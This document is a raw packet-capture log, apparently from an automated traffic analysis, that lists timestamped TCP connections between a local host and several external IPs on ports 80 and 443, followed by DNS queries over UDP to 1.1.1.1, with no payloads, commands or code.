Aug 23, 2024 18:49:00.121284008 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.121295929 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.121354103 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.143810987 CEST	80	56385	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:00.145020008 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:00.152236938 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:00.152278900 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:00.152410984 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:00.152739048 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:00.152750969 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:00.223581076 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.223629951 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.224920034 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.224931955 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.224982023 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.230887890 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.230900049 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.230931044 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.230942011 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.240819931 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.240833044 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.240860939 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.240879059 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.244121075 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.244137049 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.244146109 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.244163036 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.244167089 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.244191885 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.244210005 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.250389099 CEST	80	56394	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:00.250436068 CEST	56394	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:00.252954960 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.260982990 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.273077011 CEST	56394	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:00.276422977 CEST	56398	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:00.281614065 CEST	80	56394	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:00.284240961 CEST	80	56398	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:00.284318924 CEST	56398	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:00.285015106 CEST	56398	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:00.297919989 CEST	80	56398	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:00.604123116 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:00.612562895 CEST	80	56399	154.212.231.82	192.168.2.4
Aug 23, 2024 18:49:00.615441084 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:00.692538977 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:00.692656994 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:00.763436079 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:00.768467903 CEST	80	56399	154.212.231.82	192.168.2.4
Aug 23, 2024 18:49:00.831562996 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.831769943 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.832968950 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.832982063 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.833003044 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.833020926 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.838660955 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.838679075 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.838727951 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.844976902 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.844990969 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.845043898 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.851492882 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.851505995 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.851519108 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.851560116 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.851578951 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.855628014 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.855639935 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.855648041 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.855694056 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.925589085 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.926498890 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.926569939 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.928419113 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.928431988 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.928477049 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.932173967 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.932185888 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.932234049 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.936063051 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.936075926 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.936120033 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.940318108 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.940330982 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.940375090 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.944595098 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.944607973 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.944655895 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.947921038 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.947935104 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.947987080 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.951286077 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.951298952 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.951313019 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.951353073 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.951386929 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.954724073 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.954735994 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.954790115 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.958156109 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.958168030 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.958225012 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.961051941 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.961065054 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.961075068 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:49:00.961116076 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:00.961141109 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:49:01.436522961 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:01.436556101 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:01.436903000 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:01.437025070 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:01.437557936 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:01.480494976 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:01.672589064 CEST	80	56399	154.212.231.82	192.168.2.4
Aug 23, 2024 18:49:01.672637939 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:01.674352884 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:01.681093931 CEST	80	56399	154.212.231.82	192.168.2.4
Aug 23, 2024 18:49:01.919549942 CEST	80	56398	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:01.919617891 CEST	56398	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:01.919692993 CEST	56398	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:49:01.928530931 CEST	80	56398	85.17.31.122	192.168.2.4
Aug 23, 2024 18:49:02.062125921 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.062172890 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.062187910 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.062215090 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.062227964 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.062256098 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.065207958 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.065254927 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.065262079 CEST	443	56397	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.065303087 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.065958977 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.065979958 CEST	56397	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.067445993 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:02.081264019 CEST	80	56385	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:02.104231119 CEST	80	56399	154.212.231.82	192.168.2.4
Aug 23, 2024 18:49:02.104296923 CEST	56399	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:49:03.182677984 CEST	80	56385	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.182842970 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.188117027 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.188162088 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.188229084 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.188529015 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.188540936 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.676887989 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.676961899 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.679342031 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.679359913 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.679620028 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:03.679665089 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.680126905 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:03.720496893 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:04.287703991 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:04.287823915 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:04.287889957 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:04.287921906 CEST	443	56400	188.114.96.3	192.168.2.4
Aug 23, 2024 18:49:04.287961006 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:04.288186073 CEST	56400	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:49:04.288208961 CEST	56400	443	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2024 18:46:59.878585100 CEST	54816	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.194921970 CEST	65115	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.233679056 CEST	60426	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.245896101 CEST	54630	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.246351004 CEST	53004	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.247881889 CEST	52404	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.273297071 CEST	53	53004	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.289416075 CEST	53	52404	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.400531054 CEST	52496	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.401423931 CEST	54241	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.423805952 CEST	53	52496	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.425571918 CEST	51698	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.452471972 CEST	56705	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.468940020 CEST	53	51698	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.474263906 CEST	53	54630	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.480525970 CEST	53	65115	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.507891893 CEST	53	56705	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.569793940 CEST	54417	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.569981098 CEST	51206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.570346117 CEST	49929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.570496082 CEST	51053	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.570624113 CEST	50618	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.570748091 CEST	65350	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.570887089 CEST	62346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.571018934 CEST	64015	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.571315050 CEST	65080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.571496964 CEST	56437	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.571657896 CEST	63319	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.571813107 CEST	55836	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572108984 CEST	50934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572258949 CEST	50818	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572395086 CEST	57482	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572529078 CEST	62672	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572696924 CEST	57765	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572839022 CEST	51250	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.572989941 CEST	65159	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.573390007 CEST	62443	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.573564053 CEST	56048	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.573795080 CEST	54086	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.573945045 CEST	56164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.574074030 CEST	63865	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.576349974 CEST	59835	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.576349974 CEST	59368	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.576476097 CEST	51225	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.576623917 CEST	50373	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.576761961 CEST	63397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.584600925 CEST	58416	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.584781885 CEST	50578	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.584914923 CEST	65160	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.585066080 CEST	60206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.585199118 CEST	63935	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.585330009 CEST	64472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.589301109 CEST	57479	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.589488983 CEST	57116	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.589852095 CEST	55705	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.590068102 CEST	49835	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.590188980 CEST	53	62346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.590224981 CEST	61074	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.591567039 CEST	53	65350	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.591578007 CEST	53	54417	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.593434095 CEST	53	51206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.593446016 CEST	53	51053	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.593455076 CEST	53	64015	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.597352982 CEST	59006	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	65287	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	55176	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	59110	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	52483	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	49512	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	57207	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597352982 CEST	51854	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597385883 CEST	52947	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597385883 CEST	52304	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597385883 CEST	58471	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597385883 CEST	53318	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597385883 CEST	50207	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.597771883 CEST	64704	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.600111008 CEST	53	59368	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602751017 CEST	53	63865	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602935076 CEST	53	59835	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602945089 CEST	53	57482	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602957010 CEST	53	50934	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602967024 CEST	53	55836	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.602976084 CEST	53	62443	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.603485107 CEST	53	50373	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.603494883 CEST	53	51225	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.603502989 CEST	53	50818	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.608244896 CEST	53	63935	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.609455109 CEST	53	60206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.610599995 CEST	53	58416	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.610610962 CEST	53	64472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.613111973 CEST	53	54241	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.613123894 CEST	53	57479	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.614985943 CEST	53	65160	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.615528107 CEST	53	55705	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.617325068 CEST	53	49929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.617542982 CEST	53	57116	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.617554903 CEST	53	50618	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.618308067 CEST	53	58471	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.618762970 CEST	53	49512	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.620656013 CEST	53	52304	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.620666027 CEST	53	53318	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.620678902 CEST	53	64704	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621458054 CEST	53	51250	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621469021 CEST	53	56048	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621478081 CEST	53	62672	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621488094 CEST	53	50207	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621498108 CEST	53	57765	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.621509075 CEST	53	56164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.624515057 CEST	53	65159	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.625835896 CEST	53	63397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.630354881 CEST	53	61074	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.648852110 CEST	53	51854	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.649125099 CEST	53	55176	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.649136066 CEST	53	52947	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.673631907 CEST	57097	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.702395916 CEST	54368	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.743846893 CEST	65486	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.746706963 CEST	53	54368	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.746782064 CEST	53	63319	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.748327971 CEST	53	65080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.759429932 CEST	53	50578	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.759536982 CEST	53	49835	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.759552956 CEST	53	54086	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.776382923 CEST	53	59006	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.791019917 CEST	53971	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.791327000 CEST	56250	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.801373005 CEST	53	59110	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.817564964 CEST	53	53971	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.823256016 CEST	53	57207	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.834203005 CEST	53	54816	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.846558094 CEST	53	52483	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.884243011 CEST	52424	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.915769100 CEST	53	57097	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.928443909 CEST	53708	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.949163914 CEST	53	65486	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.949697018 CEST	53	52424	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.949707985 CEST	53	53708	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.953005075 CEST	53	65287	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.970068932 CEST	56846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.974291086 CEST	53397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.984189987 CEST	53	53397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.985197067 CEST	57069	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:00.995863914 CEST	53	56250	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:00.997397900 CEST	53	57069	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:01.029037952 CEST	53	60426	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:01.035147905 CEST	61150	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:01.090102911 CEST	53584	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:01.163475990 CEST	53	56846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:01.235857010 CEST	53	61150	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:01.347290993 CEST	53	53584	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:01.559772015 CEST	56437	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:01.610568047 CEST	50908	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:01.641521931 CEST	53	50908	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:02.078334093 CEST	64716	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:02.438819885 CEST	53	64716	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:02.575162888 CEST	53	56437	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:02.576766014 CEST	53	56437	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:03.146552086 CEST	61803	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:03.166543007 CEST	53	61803	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:15.211019993 CEST	49213	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.211019993 CEST	53573	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.212702990 CEST	63724	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.212796926 CEST	50309	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.214354038 CEST	56989	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.214385986 CEST	53194	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.215609074 CEST	63188	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.216459990 CEST	53985	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.217149973 CEST	65421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.218575001 CEST	59394	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.218575001 CEST	60422	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.219878912 CEST	53276	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.220655918 CEST	54984	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:15.221476078 CEST	49726	53	192.168.2.4	1.1.1.1
